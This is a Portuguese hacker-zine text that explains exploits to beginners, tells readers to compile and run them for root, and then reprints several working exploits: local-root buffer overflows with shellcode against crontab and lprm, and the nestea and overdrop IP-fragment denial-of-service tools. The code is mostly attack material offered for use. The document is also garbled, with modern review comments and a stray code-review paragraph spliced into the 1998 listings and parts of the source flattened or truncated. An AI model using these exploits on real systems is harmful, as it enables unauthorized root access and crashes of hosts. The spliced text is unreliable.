<><><><><><><><><><><><><>

1*********** Xploit[]'s ***********1

1 - INTRODUÇÃO:
Recentemente ainda há uma grande dúvida sobre os tão falados exploits. Muita gente ainda não sabe direito o que são, o que fazem, como usar e por que são tão procurados. Então, neste texto, vamos tentar tirar essas dúvidas.

2 - O que é um exploit:
Simplificando a explicação, um exploit é um programa que "explora" um bug em um software específico. Todos os exploits são diferentes: eles fazem coisas diferentes e exploram bugs diferentes nos sistemas. Por isso um exploit é sempre um programa específico. Foram feitos para te dar acesso root em diferentes sistemas. Eles conseguem isso explorando um bug em um software que está rodando como root (ou com privilégio equivalente, por exemplo um binário setuid root).

3 - Como eu uso um exploit:
Já que os exploits são escritos em C em 99% das vezes, você vai precisar de uma shell na box em que for usar o exploit, ou precisa estar usando o mesmo sistema operacional da box que está tentando hackear. Então, basicamente, você precisa colocar o código-fonte ou o binário no diretório da sua conta na shell. Para colocar isso na sua shell, você pode entrar via FTP e fazer o upload desse jeito, ou pode usar rz se estiver usando uma shell dialup. Já que agora você tem o exploit na box, só precisa compilar! Normalmente se compila o exploit assim:

blah:~/$ gcc exploit.c

Isso deve compilar seu exploit (sem -o, o binário gerado se chama a.out; use `gcc -o exploit exploit.c` para dar um nome a ele). De qualquer forma, leia o código-fonte antes de compilar e rodar: tem alguns exploits que são sacanagens, que fazem algo bem diferente do anunciado, justamente para pegar gente que não manja de C. Depois de compilar, o exploit está pronto. Rode o exploit e seu trabalho será feito!

4 - Onde posso pegar exploits:
Dois sites bem legais são esses:
http://get.your.exploits.com
http://www.rootshell.com

Bom, acho que já falei o básico dos exploits. Pelo menos vocês já têm uma noçãozinha do que são e do que fazem essas maravilhas. Espero que tenhamos esclarecido algumas dúvidas.

Agora mais exploit[]'Z

Exploit do overflow no LINUX BY Dave G.
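-------------------------------Corta
/*
 *
 * Dave G.
 *
 * http://www.escape.com/~daveg
 *
 *
 */
/* NOTE(review): the header names were lost when this listing was extracted
 * (only bare "#include" lines survived).  The set below covers every call
 * made in this file: stdio (printf/fprintf/perror), stdlib (malloc/atoi/exit),
 * string (memset/memcpy/strlen), fcntl (open) and unistd (write/close/execl). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define DEFAULT_OFFSET -1240
#define BUFFER_SIZE 100     /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE "./Window"

/*
 * Return the current stack pointer (low 32 bits).
 *
 * x86 GNU C only.  The original read %esp into %eax and fell off the end of
 * the function, relying on %eax being the return register; with an output
 * constraint the value is returned explicitly, so the optimiser cannot treat
 * the missing return as unreachable code.
 */
long get_esp(void)
{
    unsigned int sp;

    __asm__ volatile ("movl %%esp, %0" : "=r" (sp));
    return (long)sp;
}

/*
 * Write a crontab file whose single line is a NOP sled + shellcode padded to
 * BUFFER_SIZE bytes, followed by 878/4 copies of the guessed return address
 * (esp + ofs) and a "=X\n" tail (presumably so the line still looks like a
 * name=value assignment to crontab's parser -- see the sscanf note below),
 * then exec /usr/bin/crontab on that file.
 *
 * argv[1], if present, overrides DEFAULT_OFFSET.  Any other argument count
 * above one prints usage.
 *
 * Fixes over the original: open()/write()/close() results are checked, the
 * file is truncated and created 0600 (a 0666 file handed to a setuid program
 * could be rewritten by another local user between write and exec), a failed
 * malloc or execl now exits non-zero instead of reporting success, the "%x"
 * format no longer receives a long, and NULL is cast for the execl sentinel.
 * The 878/4 loop and the unsigned long stores assume 4-byte pointers (the
 * original ILP32 target); on an LP64 build each store is 8 bytes.
 */
int main(int argc, char **argv)
{
    int fd;
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    unsigned char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    /*
     * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
     * a '=' character appears below (until the "=X" terminator).
     */
    int i;
    int ofs = DEFAULT_OFFSET;
    size_t shell_len = strlen((char *)execshell);
    size_t payload_len;

    /* if we have an argument, use it as offset, else use default */
    if (argc == 2) {
        ofs = atoi(argv[1]);
    } else if (argc > 2) {
        fprintf(stderr, "egg [offset]\n");
        exit(-1);
    }

    /* print the offset in use; get_esp()+ofs is a long, so "%lx" not "%x" */
    printf("Using offset of esp + %d (%lx)\n", ofs,
           (unsigned long)(get_esp() + ofs));

    buff = malloc(4096);
    if (!buff) {
        /* was exit(0): an allocation failure is not a successful run */
        fprintf(stderr, "can't allocate memory\n");
        exit(1);
    }
    ptr = buff;

    /* fill start of buffer with nops so sled + shellcode is exactly
     * BUFFER_SIZE bytes */
    memset(ptr, 0x90, BUFFER_SIZE - shell_len);
    ptr += BUFFER_SIZE - shell_len;

    /* stick asm code into the buffer */
    memcpy(ptr, execshell, shell_len);
    ptr += shell_len;

    /* repeat the guessed return address; 878 bytes' worth on a 4-byte-pointer
     * target */
    addr_ptr = (unsigned long *)ptr;
    for (i = 0; i < (878 / 4); i++)
        *(addr_ptr++) = get_esp() + ofs;

    ptr = (char *)addr_ptr;
    *ptr++ = '=';
    *ptr++ = 'X';
    *ptr++ = '\n';
    *ptr = 0;

    /* Kept from the original: the file is written up to the first 0 byte.
     * If esp + ofs contains a 0x00 byte the file is cut short there, so pick
     * an offset whose address has no zero bytes. */
    payload_len = strlen(buff);

    printf("Writing to %s\n", HAPPY_FILE);
    /* O_TRUNC: without it a longer pre-existing HAPPY_FILE keeps its tail
     * after our payload.  0600: nobody else needs to read or write it. */
    fd = open(HAPPY_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) {
        perror(HAPPY_FILE);
        exit(1);
    }
    if (write(fd, buff, payload_len) != (ssize_t)payload_len) {
        perror("write");
        close(fd);
        exit(1);
    }
    if (close(fd) < 0) {
        perror("close");
        exit(1);
    }
    free(buff);

    execl("/usr/bin/crontab", "crontab", HAPPY_FILE, (char *)NULL);

    /* execl() only returns on failure; the original fell through to exit(0) */
    perror("execl /usr/bin/crontab");
    exit(1);
}
-----------------------------------Corta
------------------------------------------------------------------------------
Outro clássico overflow em Linux 4.2 BY Chris Evans
-------------------------------------Corta
/* lprm.c
 *
 *
 *
 * Exploit for the bug found by Chris Evans in Linux lprm.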
*/ #include #define PRINTER "-Pwhatever" static inline getesp() { __asm__(" movl %esp,%eax "); } main(int argc, char **argv) { int i,j,buffer,offset; long unsigned esp; char unsigned buf[4096]; unsigned char shellcode[]="\x89\xe1\x31\xc0\x50\x8d\x5c\x24\xf9\x83\xc4\x0c" "\x50\x53\x89\xca\xb0\x0b\xcd\x80/bin/sh"; buffer=990; offset=3000; if (argc>1)buffer=atoi(argv[1]); if (argc>2)offset=atoi(argv[2]); for (i=0;i> 8) & 0xFF; buf[i+2]=(esp >> 16) & 0xFF; buf[i+3]=(esp >> 24) & 0xFF; buf[i+4]=esp & 0xFF; buf[i+5]=(esp >> 8) & 0xFF; buf[i+6]=(esp >> 16) & 0xFF; buf[i+7]=(esp >> 24) & 0xFF; printf("Offset: 0x%x\n\n",esp); execl("/usr/bin/lprm","lprm",PRINTER,buf,NULL); } ----------------------------------------------------Corta ------------------------------------------------------------------------------ Bug do IP em Linux 2.0.33 BY Alan Cox -------------------------------------------------Corta Date: Thu, 16 Apr 1998 15:09:56 +0100 Reply-To: Alan Cox Subject: Linux 2.0.33 vulnerability: fragment patterns Ok duplicated. There's an 'off by one IP header' bug --- ip_fragment.c.old Thu Apr 16 12:25:34 1998 +++ ip_fragment.c Thu Apr 16 12:29:02 1998 
@@ -375,7 +375,7 @@ fp = qp->fragments; while(fp != NULL) { - if (fp->len < 0 || count+fp->len > skb->len) + if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len) { NETDEBUG(printk("Invalid fragment list: Fragment over size.\n")); ip_free(qp); ------------------------------------------------------------------ // // // // nestea.c by humble of rhino9 4/16/98 // This exploits the "off by one ip header" bug in the linux ip frag code. // Crashes linux 2.0.* and 2.1.* and some windows boxes // this code is a total rip of teardrop - it's messy // hi sygma #include #include #include #include #include #include #include #include #include #include #include // bsd usage is currently broken because of socket options on the third sendto #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. 
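Review bot: The new condition drops `count` from the bound, so if `count` is still updated in the loop body only to feed this check (the rest of the `while` body is outside the hunk) it is now dead and should go; if it is used elsewhere, note that the two bounds differ — the old one capped the running total, the new one caps each fragment by its own declared offset. Presumably `fp->offset` is relative to the IP payload while `skb->len` includes the header, which is why `qp->ihlen` is added; a comment recording that, e.g. `/* fp->offset is payload-relative; the skb also holds the ihlen-byte IP header */`, would save the next reader the derivation. Fragments that individually fit but overlap one another still pass this check, so the copy that follows (not visible in the hunk) has to tolerate overlapping data.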
to be safe, we should hit them till they die :> */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

/*
 * Entry point.  Opens a raw IP socket with IP_HDRINCL, resolves the source
 * and destination hosts from argv[1] and argv[2], reads -s (source port),
 * -t (destination port) and -n (rounds), then calls send_frags() once per
 * round with a short usleep() between rounds.  A port left at 0 is chosen
 * at random; a round count left at 0 falls back to COUNT.
 *
 * Exits 1 when the socket cannot be opened, IP_HDRINCL cannot be set, or a
 * host does not resolve; usage() is called (and does not return) for too
 * few positional arguments or an unknown option.  The socket is never
 * closed explicitly; process exit releases it.
 */
int main(int argc, char **argv)
{
    int on = 1;
    int rounds = 0;
    int opt;
    int n;
    int sock;
    u_long from = 0, to = 0;
    u_short sport = 0, dport = 0;
    struct in_addr show;

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        perror("raw socket");
        exit(1);
    }
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("IP_HDRINCL");
        exit(1);
    }

    /* the two hosts are positional and come first; usage() exits */
    if (argc < 3)
        usage(argv[0]);
    from = name_resolve(argv[1]);
    to = from ? name_resolve(argv[2]) : 0;
    if (!from || !to) {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }

    while ((opt = getopt(argc, argv, "s:t:n:")) != EOF) {
        if (opt == 's') {
            /* source port (should be ephemeral) */
            sport = (u_short)atoi(optarg);
        } else if (opt == 't') {
            /* dest port (DNS, anyone?) */
            dport = (u_short)atoi(optarg);
        } else if (opt == 'n') {
            /* number to send */
            rounds = atoi(optarg);
        } else {
            usage(argv[0]);
        }
    }

    srandom((unsigned)time((time_t)0));
    if (sport == 0)
        sport = (u_short)(random() % 0xffff);
    if (dport == 0)
        dport = (u_short)(random() % 0xffff);
    if (rounds == 0)
        rounds = COUNT;

    fputs("Nestea by humble\nCode ripped from teardrop by route / daemon9\n", stderr);
    fputs("Death on flaxen wings (yet again):\n", stderr);
    show.s_addr = from;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(show), sport);
    show.s_addr = to;
    fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(show), dport);
    fprintf(stderr, " Amt: %5d\n", rounds);
    fputs("[ ", stderr);

    for (n = 0; n < rounds; n++) {
        send_frags(sock, from, to, sport, dport);
        fputs("b00m ", stderr);
        usleep(500);
    }
    fputs("]\n", stderr);
    return 0;
}

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt)
{
    int i;
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;
/* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* 
UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); byte = 0x4F; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 44; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } -----------------------------------------------Corta ------------------------------------------------------------------------------ Ovedrop em Linux 2.0.33 BY Michal Zalewski ----------------------------------------------------------Corta From lcamtuf@boss.staszic.waw.pl Sat Apr 18 09:06:58 1998 Date: Sat, 18 Apr 1998 11:48:33 +0200 (CEST) From: Michal Zalewski Subject: ip_fragment.c - printk() problem. Here's a DoS exploit against Linux 2.0.33... It doesn't crash anything, but it's very annoying ;) Fix: --- ip_fragment.c.orig Fri Apr 17 16:42:38 1998 +++ ip_fragment.c Fri Apr 17 17:17:15 1998 
@@ -345,7 +345,7 @@ if(len>65535) { - printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)); + NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr))); ip_statistics.IpReasmFails++; ip_free(qp); return NULL; ------------------------------------------------------------------------- // // overdrop by lcamtuf [Linux 2.0.33 printk abuse] // ------------------------------------------------ // based on (reaped from) teardrop by route|daemon9 #include #include #include #include #include #include #include #include #include #include #include #define IP_MF 0x2000 #define IPH 0x14 #define UDPH 0x8 #define PADDING 0x1c #define MAGIC 0x3 #define COUNT 0xBEEF #define FRAG2 0xFFFF void usage(char *name) { fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name); exit(0); } u_long name_resolve(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr=inet_addr(host_name))==-1) { if (!(host_ent=gethostbyname(host_name))) return (0); bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length); } return (addr.s_addr); } void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) { u_char *packet=NULL,*p_ptr=NULL; u_char byte; struct sockaddr_in sin; sin.sin_family=AF_INET; sin.sin_port=src_prt; sin.sin_addr.s_addr=dst_ip; packet=(u_char *)malloc(IPH+UDPH+PADDING); p_ptr=packet; bzero((u_char *)p_ptr,IPH+UDPH+PADDING); byte=0x45; memcpy(p_ptr,&byte,sizeof(u_char)); p_ptr+=2; *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING); p_ptr+=2; *((u_short *)p_ptr)=htons(242); p_ptr+=2; *((u_short *)p_ptr)|=htons(IP_MF); p_ptr+=2; *((u_short *)p_ptr)=0x40; byte=IPPROTO_UDP; memcpy(p_ptr+1,&byte,sizeof(u_char)); p_ptr+=4; *((u_long *)p_ptr)=src_ip; p_ptr+=4; *((u_long *)p_ptr)=dst_ip; p_ptr+=4; *((u_short *)p_ptr)=htons(src_prt); p_ptr+=2; *((u_short *)p_ptr)=htons(dst_prt); p_ptr+=2; *((u_short *)p_ptr)=htons(8+PADDING); if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct 
sockaddr *)&sin, sizeof(struct sockaddr))==-1) { perror("\nsendto"); free(packet); exit(1); } p_ptr=&packet[2]; *((u_short *)p_ptr)=htons(IPH+MAGIC+1); p_ptr+=4; *((u_short *)p_ptr)=htons(FRAG2); if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin, sizeof(struct sockaddr))==-1) { perror("\nsendto"); free(packet); exit(1); } free(packet); } int main(int argc, char **argv) { int one=1,count=0,i,rip_sock,lag=500; u_long src_ip=0,dst_ip=0; u_short src_prt=0,dst_prt=0; struct in_addr addr; fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n"); if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) { perror("IP_HDRINCL"); exit(1); } if (argc < 2) usage(argv[0]); if (!(dst_ip=name_resolve(argv[1]))) { fprintf(stderr,"Can't resolve destination address.\n"); exit(1); } while ((i=getopt(argc,argv,"s:n:x"))!=EOF) { switch (i) { case 'n': count = atoi(optarg); break; case 's': if (!(src_ip=name_resolve(optarg))) { fprintf(stderr,"Can't resolve source address.\n"); exit(1); } break; case 'x': lag=0; break; default: usage(argv[0]); break; } } srandom((unsigned)(time((time_t)0))); if (!count) count=COUNT; fprintf(stderr,"Sending oversized packets:\nFrom: "); if (!src_ip) fprintf(stderr," (random)"); else { addr.s_addr = src_ip; fprintf(stderr,"%15s",inet_ntoa(addr)); } addr.s_addr = dst_ip; fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr)); fprintf(stderr," Amt: %5d\n",count); fprintf(stderr,"[ "); for (i=0;i><><><><><><><><><><><><>